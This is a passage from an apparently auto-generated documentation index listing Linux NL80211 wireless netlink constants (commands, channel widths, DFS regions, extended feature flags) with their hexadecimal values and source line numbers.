0x6 constant NL80211_CHAN_WIDTH_80 (line 4898) | NL80211_CHAN_WIDTH_80 = 0x3 constant NL80211_CHAN_WIDTH_80P80 (line 4899) | NL80211_CHAN_WIDTH_80P80 = 0x4 constant NL80211_CHAN_WIDTH_8 (line 4900) | NL80211_CHAN_WIDTH_8 = 0xb constant NL80211_CMD_ABORT_SCAN (line 4901) | NL80211_CMD_ABORT_SCAN = 0x72 constant NL80211_CMD_ACTION (line 4902) | NL80211_CMD_ACTION = 0x3b constant NL80211_CMD_ACTION_TX_STATUS (line 4903) | NL80211_CMD_ACTION_TX_STATUS = 0x3c constant NL80211_CMD_ADD_LINK (line 4904) | NL80211_CMD_ADD_LINK = 0x94 constant NL80211_CMD_ADD_LINK_STA (line 4905) | NL80211_CMD_ADD_LINK_STA = 0x96 constant NL80211_CMD_ADD_NAN_FUNCTION (line 4906) | NL80211_CMD_ADD_NAN_FUNCTION = 0x75 constant NL80211_CMD_ADD_TX_TS (line 4907) | NL80211_CMD_ADD_TX_TS = 0x69 constant NL80211_CMD_ASSOC_COMEBACK (line 4908) | NL80211_CMD_ASSOC_COMEBACK = 0x93 constant NL80211_CMD_ASSOCIATE (line 4909) | NL80211_CMD_ASSOCIATE = 0x26 constant NL80211_CMD_AUTHENTICATE (line 4910) | NL80211_CMD_AUTHENTICATE = 0x25 constant NL80211_CMD_CANCEL_REMAIN_ON_CHANNEL (line 4911) | NL80211_CMD_CANCEL_REMAIN_ON_CHANNEL = 0x38 constant NL80211_CMD_CHANGE_NAN_CONFIG (line 4912) | NL80211_CMD_CHANGE_NAN_CONFIG = 0x77 constant NL80211_CMD_CHANNEL_SWITCH (line 4913) | NL80211_CMD_CHANNEL_SWITCH = 0x66 constant NL80211_CMD_CH_SWITCH_NOTIFY (line 4914) | NL80211_CMD_CH_SWITCH_NOTIFY = 0x58 constant NL80211_CMD_CH_SWITCH_STARTED_NOTIFY (line 4915) | NL80211_CMD_CH_SWITCH_STARTED_NOTIFY = 0x6e constant NL80211_CMD_COLOR_CHANGE_ABORTED (line 4916) | NL80211_CMD_COLOR_CHANGE_ABORTED = 0x90 constant NL80211_CMD_COLOR_CHANGE_COMPLETED (line 4917) | NL80211_CMD_COLOR_CHANGE_COMPLETED = 0x91 constant NL80211_CMD_COLOR_CHANGE_REQUEST (line 4918) | NL80211_CMD_COLOR_CHANGE_REQUEST = 0x8e constant NL80211_CMD_COLOR_CHANGE_STARTED (line 4919) | NL80211_CMD_COLOR_CHANGE_STARTED = 0x8f constant NL80211_CMD_CONNECT (line 4920) | NL80211_CMD_CONNECT = 0x2e constant NL80211_CMD_CONN_FAILED (line 4921) | NL80211_CMD_CONN_FAILED = 0x5b constant NL80211_CMD_CONTROL_PORT_FRAME (line 4922) | NL80211_CMD_CONTROL_PORT_FRAME = 0x81 constant NL80211_CMD_CONTROL_PORT_FRAME_TX_STATUS (line 4923) | NL80211_CMD_CONTROL_PORT_FRAME_TX_STATUS = 0x8b constant NL80211_CMD_CRIT_PROTOCOL_START (line 4924) | NL80211_CMD_CRIT_PROTOCOL_START = 0x62 constant NL80211_CMD_CRIT_PROTOCOL_STOP (line 4925) | NL80211_CMD_CRIT_PROTOCOL_STOP = 0x63 constant NL80211_CMD_DEAUTHENTICATE (line 4926) | NL80211_CMD_DEAUTHENTICATE = 0x27 constant NL80211_CMD_DEL_BEACON (line 4927) | NL80211_CMD_DEL_BEACON = 0x10 constant NL80211_CMD_DEL_INTERFACE (line 4928) | NL80211_CMD_DEL_INTERFACE = 0x8 constant NL80211_CMD_DEL_KEY (line 4929) | NL80211_CMD_DEL_KEY = 0xc constant NL80211_CMD_DEL_MPATH (line 4930) | NL80211_CMD_DEL_MPATH = 0x18 constant NL80211_CMD_DEL_NAN_FUNCTION (line 4931) | NL80211_CMD_DEL_NAN_FUNCTION = 0x76 constant NL80211_CMD_DEL_PMK (line 4932) | NL80211_CMD_DEL_PMK = 0x7c constant NL80211_CMD_DEL_PMKSA (line 4933) | NL80211_CMD_DEL_PMKSA = 0x35 constant NL80211_CMD_DEL_STATION (line 4934) | NL80211_CMD_DEL_STATION = 0x14 constant NL80211_CMD_DEL_TX_TS (line 4935) | NL80211_CMD_DEL_TX_TS = 0x6a constant NL80211_CMD_DEL_WIPHY (line 4936) | NL80211_CMD_DEL_WIPHY = 0x4 constant NL80211_CMD_DISASSOCIATE (line 4937) | NL80211_CMD_DISASSOCIATE = 0x28 constant NL80211_CMD_DISCONNECT (line 4938) | NL80211_CMD_DISCONNECT = 0x30 constant NL80211_CMD_EXTERNAL_AUTH (line 4939) | NL80211_CMD_EXTERNAL_AUTH = 0x7f constant NL80211_CMD_FLUSH_PMKSA (line 4940) | NL80211_CMD_FLUSH_PMKSA = 0x36 constant NL80211_CMD_FRAME (line 4941) | NL80211_CMD_FRAME = 0x3b constant NL80211_CMD_FRAME_TX_STATUS (line 4942) | NL80211_CMD_FRAME_TX_STATUS = 0x3c constant NL80211_CMD_FRAME_WAIT_CANCEL (line 4943) | NL80211_CMD_FRAME_WAIT_CANCEL = 0x43 constant NL80211_CMD_FT_EVENT (line 4944) | NL80211_CMD_FT_EVENT = 0x61 constant NL80211_CMD_GET_BEACON (line 4945) | NL80211_CMD_GET_BEACON = 0xd constant NL80211_CMD_GET_COALESCE (line 4946) | NL80211_CMD_GET_COALESCE = 0x64 constant NL80211_CMD_GET_FTM_RESPONDER_STATS (line 4947) | NL80211_CMD_GET_FTM_RESPONDER_STATS = 0x82 constant NL80211_CMD_GET_INTERFACE (line 4948) | NL80211_CMD_GET_INTERFACE = 0x5 constant NL80211_CMD_GET_KEY (line 4949) | NL80211_CMD_GET_KEY = 0x9 constant NL80211_CMD_GET_MESH_CONFIG (line 4950) | NL80211_CMD_GET_MESH_CONFIG = 0x1c constant NL80211_CMD_GET_MESH_PARAMS (line 4951) | NL80211_CMD_GET_MESH_PARAMS = 0x1c constant NL80211_CMD_GET_MPATH (line 4952) | NL80211_CMD_GET_MPATH = 0x15 constant NL80211_CMD_GET_MPP (line 4953) | NL80211_CMD_GET_MPP = 0x6b constant NL80211_CMD_GET_POWER_SAVE (line 4954) | NL80211_CMD_GET_POWER_SAVE = 0x3e constant NL80211_CMD_GET_PROTOCOL_FEATURES (line 4955) | NL80211_CMD_GET_PROTOCOL_FEATURES = 0x5f constant NL80211_CMD_GET_REG (line 4956) | NL80211_CMD_GET_REG = 0x1f constant NL80211_CMD_GET_SCAN (line 4957) | NL80211_CMD_GET_SCAN = 0x20 constant NL80211_CMD_GET_STATION (line 4958) | NL80211_CMD_GET_STATION = 0x11 constant NL80211_CMD_GET_SURVEY (line 4959) | NL80211_CMD_GET_SURVEY = 0x32 constant NL80211_CMD_GET_WIPHY (line 4960) | NL80211_CMD_GET_WIPHY = 0x1 constant NL80211_CMD_GET_WOWLAN (line 4961) | NL80211_CMD_GET_WOWLAN = 0x49 constant NL80211_CMD_JOIN_IBSS (line 4962) | NL80211_CMD_JOIN_IBSS = 0x2b constant NL80211_CMD_JOIN_MESH (line 4963) | NL80211_CMD_JOIN_MESH = 0x44 constant NL80211_CMD_JOIN_OCB (line 4964) | NL80211_CMD_JOIN_OCB = 0x6c constant NL80211_CMD_LEAVE_IBSS (line 4965) | NL80211_CMD_LEAVE_IBSS = 0x2c constant NL80211_CMD_LEAVE_MESH (line 4966) | NL80211_CMD_LEAVE_MESH = 0x45 constant NL80211_CMD_LEAVE_OCB (line 4967) | NL80211_CMD_LEAVE_OCB = 0x6d constant NL80211_CMD_MAX (line 4968) | NL80211_CMD_MAX = 0x9a constant NL80211_CMD_MICHAEL_MIC_FAILURE (line 4969) | NL80211_CMD_MICHAEL_MIC_FAILURE = 0x29 constant NL80211_CMD_MODIFY_LINK_STA (line 4970) | NL80211_CMD_MODIFY_LINK_STA = 0x97 constant NL80211_CMD_NAN_MATCH (line 4971) | NL80211_CMD_NAN_MATCH = 0x78 constant NL80211_CMD_NEW_BEACON (line 4972) | NL80211_CMD_NEW_BEACON = 0xf constant NL80211_CMD_NEW_INTERFACE (line 4973) | NL80211_CMD_NEW_INTERFACE = 0x7 constant NL80211_CMD_NEW_KEY (line 4974) | NL80211_CMD_NEW_KEY = 0xb constant NL80211_CMD_NEW_MPATH (line 4975) | NL80211_CMD_NEW_MPATH = 0x17 constant NL80211_CMD_NEW_PEER_CANDIDATE (line 4976) | NL80211_CMD_NEW_PEER_CANDIDATE = 0x48 constant NL80211_CMD_NEW_SCAN_RESULTS (line 4977) | NL80211_CMD_NEW_SCAN_RESULTS = 0x22 constant NL80211_CMD_NEW_STATION (line 4978) | NL80211_CMD_NEW_STATION = 0x13 constant NL80211_CMD_NEW_SURVEY_RESULTS (line 4979) | NL80211_CMD_NEW_SURVEY_RESULTS = 0x33 constant NL80211_CMD_NEW_WIPHY (line 4980) | NL80211_CMD_NEW_WIPHY = 0x3 constant NL80211_CMD_NOTIFY_CQM (line 4981) | NL80211_CMD_NOTIFY_CQM = 0x40 constant NL80211_CMD_NOTIFY_RADAR (line 4982) | NL80211_CMD_NOTIFY_RADAR = 0x86 constant NL80211_CMD_OBSS_COLOR_COLLISION (line 4983) | NL80211_CMD_OBSS_COLOR_COLLISION = 0x8d constant NL80211_CMD_PEER_MEASUREMENT_COMPLETE (line 4984) | NL80211_CMD_PEER_MEASUREMENT_COMPLETE = 0x85 constant NL80211_CMD_PEER_MEASUREMENT_RESULT (line 4985) | NL80211_CMD_PEER_MEASUREMENT_RESULT = 0x84 constant NL80211_CMD_PEER_MEASUREMENT_START (line 4986) | NL80211_CMD_PEER_MEASUREMENT_START = 0x83 constant NL80211_CMD_PMKSA_CANDIDATE (line 4987) | NL80211_CMD_PMKSA_CANDIDATE = 0x50 constant NL80211_CMD_PORT_AUTHORIZED (line 4988) | NL80211_CMD_PORT_AUTHORIZED = 0x7d constant NL80211_CMD_PROBE_CLIENT (line 4989) | NL80211_CMD_PROBE_CLIENT = 0x54 constant NL80211_CMD_PROBE_MESH_LINK (line 4990) | NL80211_CMD_PROBE_MESH_LINK = 0x88 constant NL80211_CMD_RADAR_DETECT (line 4991) | NL80211_CMD_RADAR_DETECT = 0x5e constant NL80211_CMD_REG_BEACON_HINT (line 4992) | NL80211_CMD_REG_BEACON_HINT = 0x2a constant NL80211_CMD_REG_CHANGE (line 4993) | NL80211_CMD_REG_CHANGE = 0x24 constant NL80211_CMD_REGISTER_ACTION (line 4994) | NL80211_CMD_REGISTER_ACTION = 0x3a constant NL80211_CMD_REGISTER_BEACONS (line 4995) | NL80211_CMD_REGISTER_BEACONS = 0x55 constant NL80211_CMD_REGISTER_FRAME (line 4996) | NL80211_CMD_REGISTER_FRAME = 0x3a constant NL80211_CMD_RELOAD_REGDB (line 4997) | NL80211_CMD_RELOAD_REGDB = 0x7e constant NL80211_CMD_REMAIN_ON_CHANNEL (line 4998) | NL80211_CMD_REMAIN_ON_CHANNEL = 0x37 constant NL80211_CMD_REMOVE_LINK (line 4999) | NL80211_CMD_REMOVE_LINK = 0x95 constant NL80211_CMD_REMOVE_LINK_STA (line 5000) | NL80211_CMD_REMOVE_LINK_STA = 0x98 constant NL80211_CMD_REQ_SET_REG (line 5001) | NL80211_CMD_REQ_SET_REG = 0x1b constant NL80211_CMD_ROAM (line 5002) | NL80211_CMD_ROAM = 0x2f constant NL80211_CMD_SCAN_ABORTED (line 5003) | NL80211_CMD_SCAN_ABORTED = 0x23 constant NL80211_CMD_SCHED_SCAN_RESULTS (line 5004) | NL80211_CMD_SCHED_SCAN_RESULTS = 0x4d constant NL80211_CMD_SCHED_SCAN_STOPPED (line 5005) | NL80211_CMD_SCHED_SCAN_STOPPED = 0x4e constant NL80211_CMD_SET_BEACON (line 5006) | NL80211_CMD_SET_BEACON = 0xe constant NL80211_CMD_SET_BSS (line 5007) | NL80211_CMD_SET_BSS = 0x19 constant NL80211_CMD_SET_CHANNEL (line 5008) | NL80211_CMD_SET_CHANNEL = 0x41 constant NL80211_CMD_SET_COALESCE (line 5009) | NL80211_CMD_SET_COALESCE = 0x65 constant NL80211_CMD_SET_CQM (line 5010) | NL80211_CMD_SET_CQM = 0x3f constant NL80211_CMD_SET_FILS_AAD (line 5011) | NL80211_CMD_SET_FILS_AAD = 0x92 constant NL80211_CMD_SET_INTERFACE (line 5012) | NL80211_CMD_SET_INTERFACE = 0x6 constant NL80211_CMD_SET_KEY (line 5013) | NL80211_CMD_SET_KEY = 0xa constant NL80211_CMD_SET_MAC_ACL (line 5014) | NL80211_CMD_SET_MAC_ACL = 0x5d constant NL80211_CMD_SET_MCAST_RATE (line 5015) | NL80211_CMD_SET_MCAST_RATE = 0x5c constant NL80211_CMD_SET_MESH_CONFIG (line 5016) | NL80211_CMD_SET_MESH_CONFIG = 0x1d constant NL80211_CMD_SET_MESH_PARAMS (line 5017) | NL80211_CMD_SET_MESH_PARAMS = 0x1d constant NL80211_CMD_SET_MGMT_EXTRA_IE (line 5018) | NL80211_CMD_SET_MGMT_EXTRA_IE = 0x1e constant NL80211_CMD_SET_MPATH (line 5019) | NL80211_CMD_SET_MPATH = 0x16 constant NL80211_CMD_SET_MULTICAST_TO_UNICAST (line 5020) | NL80211_CMD_SET_MULTICAST_TO_UNICAST = 0x79 constant NL80211_CMD_SET_NOACK_MAP (line 5021) | NL80211_CMD_SET_NOACK_MAP = 0x57 constant NL80211_CMD_SET_PMK (line 5022) | NL80211_CMD_SET_PMK = 0x7b constant NL80211_CMD_SET_PMKSA (line 5023) | NL80211_CMD_SET_PMKSA = 0x34 constant NL80211_CMD_SET_POWER_SAVE (line 5024) | NL80211_CMD_SET_POWER_SAVE = 0x3d constant NL80211_CMD_SET_QOS_MAP (line 5025) | NL80211_CMD_SET_QOS_MAP = 0x68 constant NL80211_CMD_SET_REG (line 5026) | NL80211_CMD_SET_REG = 0x1a constant NL80211_CMD_SET_REKEY_OFFLOAD (line 5027) | NL80211_CMD_SET_REKEY_OFFLOAD = 0x4f constant NL80211_CMD_SET_SAR_SPECS (line 5028) | NL80211_CMD_SET_SAR_SPECS = 0x8c constant NL80211_CMD_SET_STATION (line 5029) | NL80211_CMD_SET_STATION = 0x12 constant NL80211_CMD_SET_TID_CONFIG (line 5030) | NL80211_CMD_SET_TID_CONFIG = 0x89 constant NL80211_CMD_SET_TX_BITRATE_MASK (line 5031) | NL80211_CMD_SET_TX_BITRATE_MASK = 0x39 constant NL80211_CMD_SET_WDS_PEER (line 5032) | NL80211_CMD_SET_WDS_PEER = 0x42 constant NL80211_CMD_SET_WIPHY (line 5033) | NL80211_CMD_SET_WIPHY = 0x2 constant NL80211_CMD_SET_WIPHY_NETNS (line 5034) | NL80211_CMD_SET_WIPHY_NETNS = 0x31 constant NL80211_CMD_SET_WOWLAN (line 5035) | NL80211_CMD_SET_WOWLAN = 0x4a constant NL80211_CMD_STA_OPMODE_CHANGED (line 5036) | NL80211_CMD_STA_OPMODE_CHANGED = 0x80 constant NL80211_CMD_START_AP (line 5037) | NL80211_CMD_START_AP = 0xf constant NL80211_CMD_START_NAN (line 5038) | NL80211_CMD_START_NAN = 0x73 constant NL80211_CMD_START_P2P_DEVICE (line 5039) | NL80211_CMD_START_P2P_DEVICE = 0x59 constant NL80211_CMD_START_SCHED_SCAN (line 5040) | NL80211_CMD_START_SCHED_SCAN = 0x4b constant NL80211_CMD_STOP_AP (line 5041) | NL80211_CMD_STOP_AP = 0x10 constant NL80211_CMD_STOP_NAN (line 5042) | NL80211_CMD_STOP_NAN = 0x74 constant NL80211_CMD_STOP_P2P_DEVICE (line 5043) | NL80211_CMD_STOP_P2P_DEVICE = 0x5a constant NL80211_CMD_STOP_SCHED_SCAN (line 5044) | NL80211_CMD_STOP_SCHED_SCAN = 0x4c constant NL80211_CMD_TDLS_CANCEL_CHANNEL_SWITCH (line 5045) | NL80211_CMD_TDLS_CANCEL_CHANNEL_SWITCH = 0x70 constant NL80211_CMD_TDLS_CHANNEL_SWITCH (line 5046) | NL80211_CMD_TDLS_CHANNEL_SWITCH = 0x6f constant NL80211_CMD_TDLS_MGMT (line 5047) | NL80211_CMD_TDLS_MGMT = 0x52 constant NL80211_CMD_TDLS_OPER (line 5048) | NL80211_CMD_TDLS_OPER = 0x51 constant NL80211_CMD_TESTMODE (line 5049) | NL80211_CMD_TESTMODE = 0x2d constant NL80211_CMD_TRIGGER_SCAN (line 5050) | NL80211_CMD_TRIGGER_SCAN = 0x21 constant NL80211_CMD_UNEXPECTED_4ADDR_FRAME (line 5051) | NL80211_CMD_UNEXPECTED_4ADDR_FRAME = 0x56 constant NL80211_CMD_UNEXPECTED_FRAME (line 5052) | NL80211_CMD_UNEXPECTED_FRAME = 0x53 constant NL80211_CMD_UNPROT_BEACON (line 5053) | NL80211_CMD_UNPROT_BEACON = 0x8a constant NL80211_CMD_UNPROT_DEAUTHENTICATE (line 5054) | NL80211_CMD_UNPROT_DEAUTHENTICATE = 0x46 constant NL80211_CMD_UNPROT_DISASSOCIATE (line 5055) | NL80211_CMD_UNPROT_DISASSOCIATE = 0x47 constant NL80211_CMD_UNSPEC (line 5056) | NL80211_CMD_UNSPEC = 0x0 constant NL80211_CMD_UPDATE_CONNECT_PARAMS (line 5057) | NL80211_CMD_UPDATE_CONNECT_PARAMS = 0x7a constant NL80211_CMD_UPDATE_FT_IES (line 5058) | NL80211_CMD_UPDATE_FT_IES = 0x60 constant NL80211_CMD_UPDATE_OWE_INFO (line 5059) | NL80211_CMD_UPDATE_OWE_INFO = 0x87 constant NL80211_CMD_VENDOR (line 5060) | NL80211_CMD_VENDOR = 0x67 constant NL80211_CMD_WIPHY_REG_CHANGE (line 5061) | NL80211_CMD_WIPHY_REG_CHANGE = 0x71 constant NL80211_COALESCE_CONDITION_MATCH (line 5062) | NL80211_COALESCE_CONDITION_MATCH = 0x0 constant NL80211_COALESCE_CONDITION_NO_MATCH (line 5063) | NL80211_COALESCE_CONDITION_NO_MATCH = 0x1 constant NL80211_CONN_FAIL_BLOCKED_CLIENT (line 5064) | NL80211_CONN_FAIL_BLOCKED_CLIENT = 0x1 constant NL80211_CONN_FAIL_MAX_CLIENTS (line 5065) | NL80211_CONN_FAIL_MAX_CLIENTS = 0x0 constant NL80211_CQM_RSSI_BEACON_LOSS_EVENT (line 5066) | NL80211_CQM_RSSI_BEACON_LOSS_EVENT = 0x2 constant NL80211_CQM_RSSI_THRESHOLD_EVENT_HIGH (line 5067) | NL80211_CQM_RSSI_THRESHOLD_EVENT_HIGH = 0x1 constant NL80211_CQM_RSSI_THRESHOLD_EVENT_LOW (line 5068) | NL80211_CQM_RSSI_THRESHOLD_EVENT_LOW = 0x0 constant NL80211_CQM_TXE_MAX_INTVL (line 5069) | NL80211_CQM_TXE_MAX_INTVL = 0x708 constant NL80211_CRIT_PROTO_APIPA (line 5070) | NL80211_CRIT_PROTO_APIPA = 0x3 constant NL80211_CRIT_PROTO_DHCP (line 5071) | NL80211_CRIT_PROTO_DHCP = 0x1 constant NL80211_CRIT_PROTO_EAPOL (line 5072) | NL80211_CRIT_PROTO_EAPOL = 0x2 constant NL80211_CRIT_PROTO_MAX_DURATION (line 5073) | NL80211_CRIT_PROTO_MAX_DURATION = 0x1388 constant NL80211_CRIT_PROTO_UNSPEC (line 5074) | NL80211_CRIT_PROTO_UNSPEC = 0x0 constant NL80211_DFS_AVAILABLE (line 5075) | NL80211_DFS_AVAILABLE = 0x2 constant NL80211_DFS_ETSI (line 5076) | NL80211_DFS_ETSI = 0x2 constant NL80211_DFS_FCC (line 5077) | NL80211_DFS_FCC = 0x1 constant NL80211_DFS_JP (line 5078) | NL80211_DFS_JP = 0x3 constant NL80211_DFS_UNAVAILABLE (line 5079) | NL80211_DFS_UNAVAILABLE = 0x1 constant NL80211_DFS_UNSET (line 5080) | NL80211_DFS_UNSET = 0x0 constant NL80211_DFS_USABLE (line 5081) | NL80211_DFS_USABLE = 0x0 constant NL80211_EDMG_BW_CONFIG_MAX (line 5082) | NL80211_EDMG_BW_CONFIG_MAX = 0xf constant NL80211_EDMG_BW_CONFIG_MIN (line 5083) | NL80211_EDMG_BW_CONFIG_MIN = 0x4 constant NL80211_EDMG_CHANNELS_MAX (line 5084) | NL80211_EDMG_CHANNELS_MAX = 0x3c constant NL80211_EDMG_CHANNELS_MIN (line 5085) | NL80211_EDMG_CHANNELS_MIN = 0x1 constant NL80211_EHT_MAX_CAPABILITY_LEN (line 5086) | NL80211_EHT_MAX_CAPABILITY_LEN = 0x33 constant NL80211_EHT_MIN_CAPABILITY_LEN (line 5087) | NL80211_EHT_MIN_CAPABILITY_LEN = 0xd constant NL80211_EXTERNAL_AUTH_ABORT (line 5088) | NL80211_EXTERNAL_AUTH_ABORT = 0x1 constant NL80211_EXTERNAL_AUTH_START (line 5089) | NL80211_EXTERNAL_AUTH_START = 0x0 constant NL80211_EXT_FEATURE_4WAY_HANDSHAKE_AP_PSK (line 5090) | NL80211_EXT_FEATURE_4WAY_HANDSHAKE_AP_PSK = 0x32 constant NL80211_EXT_FEATURE_4WAY_HANDSHAKE_STA_1X (line 5091) | NL80211_EXT_FEATURE_4WAY_HANDSHAKE_STA_1X = 0x10 constant NL80211_EXT_FEATURE_4WAY_HANDSHAKE_STA_PSK (line 5092) | NL80211_EXT_FEATURE_4WAY_HANDSHAKE_STA_PSK = 0xf constant NL80211_EXT_FEATURE_ACCEPT_BCAST_PROBE_RESP (line 5093) | NL80211_EXT_FEATURE_ACCEPT_BCAST_PROBE_RESP = 0x12 constant NL80211_EXT_FEATURE_ACK_SIGNAL_SUPPORT (line 5094) | NL80211_EXT_FEATURE_ACK_SIGNAL_SUPPORT = 0x1b constant NL80211_EXT_FEATURE_AIRTIME_FAIRNESS (line 5095) | NL80211_EXT_FEATURE_AIRTIME_FAIRNESS = 0x21 constant NL80211_EXT_FEATURE_AP_PMKSA_CACHING (line 5096) | NL80211_EXT_FEATURE_AP_PMKSA_CACHING = 0x22 constant NL80211_EXT_FEATURE_AQL (line 5097) | NL80211_EXT_FEATURE_AQL = 0x28 constant NL80211_EXT_FEATURE_BEACON_PROTECTION_CLIENT (line 5098) | NL80211_EXT_FEATURE_BEACON_PROTECTION_CLIENT = 0x2e constant NL80211_EXT_FEATURE_BEACON_PROTECTION (line 5099) | NL80211_EXT_FEATURE_BEACON_PROTECTION = 0x29 constant NL80211_EXT_FEATURE_BEACON_RATE_HE (line 5100) | NL80211_EXT_FEATURE_BEACON_RATE_HE = 0x36 constant NL80211_EXT_FEATURE_BEACON_RATE_HT (line 5101) | NL80211_EXT_FEATURE_BEACON_RATE_HT = 0x7 constant NL80211_EXT_FEATURE_BEACON_RATE_LEGACY (line 5102) | NL80211_EXT_FEATURE_BEACON_RATE_LEGACY = 0x6 constant NL80211_EXT_FEATURE_BEACON_RATE_VHT (line 5103) | NL80211_EXT_FEATURE_BEACON_RATE_VHT = 0x8 constant NL80211_EXT_FEATURE_BSS_COLOR (line 5104) | NL80211_EXT_FEATURE_BSS_COLOR = 0x3a constant NL80211_EXT_FEATURE_BSS_PARENT_TSF (line 5105) | NL80211_EXT_FEATURE_BSS_PARENT_TSF = 0x4 constant NL80211_EXT_FEATURE_CAN_REPLACE_PTK0 (line 5106) | NL80211_EXT_FEATURE_CAN_REPLACE_PTK0 = 0x1f constant NL80211_EXT_FEATURE_CONTROL_PORT_NO_PREAUTH (line 5107) | NL80211_EXT_FEATURE_CONTROL_PORT_NO_PREAUTH = 0x2a constant NL80211_EXT_FEATURE_CONTROL_PORT_OVER_NL80211 (line 5108) | NL80211_EXT_FEATURE_CONTROL_PORT_OVER_NL80211 = 0x1a constant NL80211_EXT_FEATURE_CONTROL_PORT_OVER_NL80211_TX_STATUS (line 5109) | NL80211_EXT_FEATURE_CONTROL_PORT_OVER_NL80211_TX_STATUS = 0x30 constant NL80211_EXT_FEATURE_CQM_RSSI_LIST (line 5110) | NL80211_EXT_FEATURE_CQM_RSSI_LIST = 0xd constant NL80211_EXT_FEATURE_DATA_ACK_SIGNAL_SUPPORT (line 5111) | NL80211_EXT_FEATURE_DATA_ACK_SIGNAL_SUPPORT = 0x1b constant NL80211_EXT_FEATURE_DEL_IBSS_STA (line 5112) | NL80211_EXT_FEATURE_DEL_IBSS_STA = 0x2c constant NL80211_EXT_FEATURE_DFS_OFFLOAD (line 5113) | NL80211_EXT_FEATURE_DFS_OFFLOAD = 0x19 constant NL80211_EXT_FEATURE_ENABLE_FTM_RESPONDER (line 5114) | NL80211_EXT_FEATURE_ENABLE_FTM_RESPONDER = 0x20 constant NL80211_EXT_FEATURE_EXT_KEY_ID (line 5115) | NL80211_EXT_FEATURE_EXT_KEY_ID = 0x24 constant NL80211_EXT_FEATURE_FILS_CRYPTO_OFFLOAD (line 5116) | NL80211_EXT_FEATURE_FILS_CRYPTO_OFFLOAD = 0x3b constant NL80211_EXT_FEATURE_FILS_DISCOVERY (line 5117) | NL80211_EXT_FEATURE_FILS_DISCOVERY = 0x34 constant NL80211_EXT_FEATURE_FILS_MAX_CHANNEL_TIME (line 5118) | NL80211_EXT_FEATURE_FILS_MAX_CHANNEL_TIME = 0x11 constant NL80211_EXT_FEATURE_FILS_SK_OFFLOAD (line 5119) | NL80211_EXT_FEATURE_FILS_SK_OFFLOAD = 0xe constant NL80211_EXT_FEATURE_FILS_STA (line 5120) | NL80211_EXT_FEATURE_FILS_STA = 0x9 constant NL80211_EXT_FEATURE_HIGH_ACCURACY_SCAN (line 5121) | NL80211_EXT_FEATURE_HIGH_ACCURACY_SCAN = 0x18 constant NL80211_EXT_FEATURE_LOW_POWER_SCAN (line 5122) | NL80211_EXT_FEATURE_LOW_POWER_SCAN = 0x17 constant NL80211_EXT_FEATURE_LOW_SPAN_SCAN (line 5123) | NL80211_EXT_FEATURE_LOW_SPAN_SCAN = 0x16 constant NL80211_EXT_FEATURE_MFP_OPTIONAL (line 5124) | NL80211_EXT_FEATURE_MFP_OPTIONAL = 0x15 constant NL80211_EXT_FEATURE_MGMT_TX_RANDOM_TA (line 5125) | NL80211_EXT_FEATURE_MGMT_TX_RANDOM_TA = 0xa constant NL80211_EXT_FEATURE_MGMT_TX_RANDOM_TA_CONNECTED (line 5126) | NL80211_EXT_FEATURE_MGMT_TX_RANDOM_TA_CONNECTED = 0xb constant NL80211_EXT_FEATURE_MULTICAST_REGISTRATIONS (line 5127) | NL80211_EXT_FEATURE_MULTICAST_REGISTRATIONS = 0x2d constant NL80211_EXT_FEATURE_MU_MIMO_AIR_SNIFFER (line 5128) | NL80211_EXT_FEATURE_MU_MIMO_AIR_SNIFFER = 0x2 constant NL80211_EXT_FEATURE_OCE_PROBE_REQ_DEFERRAL_SUPPRESSION (line 5129) | NL80211_EXT_FEATURE_OCE_PROBE_REQ_DEFERRAL_SUPPRESSION = 0x14 constant NL80211_EXT_FEATURE_OCE_PROBE_REQ_HIGH_TX_RATE (line 5130) | NL80211_EXT_FEATURE_OCE_PROBE_REQ_HIGH_TX_RATE = 0x13 constant NL80211_EXT_FEATURE_OPERATING_CHANNEL_VALIDATION (line 5131) | NL80211_EXT_FEATURE_OPERATING_CHANNEL_VALIDATION = 0x31 constant NL80211_EXT_FEATURE_POWERED_ADDR_CHANGE (line 5132) | NL80211_EXT_FEATURE_POWERED_ADDR_CHANGE = 0x3d constant NL80211_EXT_FEATURE_PROTECTED_TWT (line 5133) | NL80211_EXT_FEATURE_PROTECTED_TWT = 0x2b constant NL80211_EXT_FEATURE_PROT_RANGE_NEGO_AND_MEASURE (line 5134) | NL80211_EXT_FEATURE_PROT_RANGE_NEGO_AND_MEASURE = 0x39 constant NL80211_EXT_FEATURE_RADAR_BACKGROUND (line 5135) | NL80211_EXT_FEATURE_RADAR_BACKGROUND = 0x3c constant NL80211_EXT_FEATURE_RRM (line 5136) | NL80211_EXT_FEATURE_RRM = 0x1 constant NL80211_EXT_FEATURE_SAE_OFFLOAD_AP (line 5137) | NL80211_EXT_FEATURE_SAE_OFFLOAD_AP = 0x33 constant NL80211_EXT_FEATURE_SAE_OFFLOAD (line 5138) | NL80211_EXT_FEATURE_SAE_OFFLOAD = 0x26 constant NL80211_EXT_FEATURE_SCAN_FREQ_KHZ (line 5139) | NL80211_EXT_FEATURE_SCAN_FREQ_KHZ = 0x2f constant NL80211_EXT_FEATURE_SCAN_MIN_PREQ_CONTENT (line 5140) | NL80211_EXT_FEATURE_SCAN_MIN_PREQ_CONTENT = 0x1e constant NL80211_EXT_FEATURE_SCAN_RANDOM_SN (line 5141) | NL80211_EXT_FEATURE_SCAN_RANDOM_SN = 0x1d constant NL80211_EXT_FEATURE_SCAN_START_TIME (line 5142) | NL80211_EXT_FEATURE_SCAN_START_TIME = 0x3 constant NL80211_EXT_FEATURE_SCHED_SCAN_BAND_SPECIFIC_RSSI_THOLD (line 5143) | NL80211_EXT_FEATURE_SCHED_SCAN_BAND_SPECIFIC_RSSI_THOLD = 0x23 constant NL80211_EXT_FEATURE_SCHED_SCAN_RELATIVE_RSSI (line 5144) | NL80211_EXT_FEATURE_SCHED_SCAN_RELATIVE_RSSI = 0xc constant NL80211_EXT_FEATURE_SECURE_LTF (line 5145) | NL80211_EXT_FEATURE_SECURE_LTF = 0x37 constant NL80211_EXT_FEATURE_SECURE_RTT (line 5146) | NL80211_EXT_FEATURE_SECURE_RTT = 0x38 constant NL80211_EXT_FEATURE_SET_SCAN_DWELL (line 5147) | NL80211_EXT_FEATURE_SET_SCAN_DWELL = 0x5 constant NL80211_EXT_FEATURE_STA_TX_PWR (line 5148) | NL80211_EXT_FEATURE_STA_TX_PWR = 0x25 constant NL80211_EXT_FEATURE_TXQS (line 5149) | NL80211_EXT_FEATURE_TXQS = 0x1c constant NL80211_EXT_FEATURE_UNSOL_BCAST_PROBE_RESP (line 5150) | 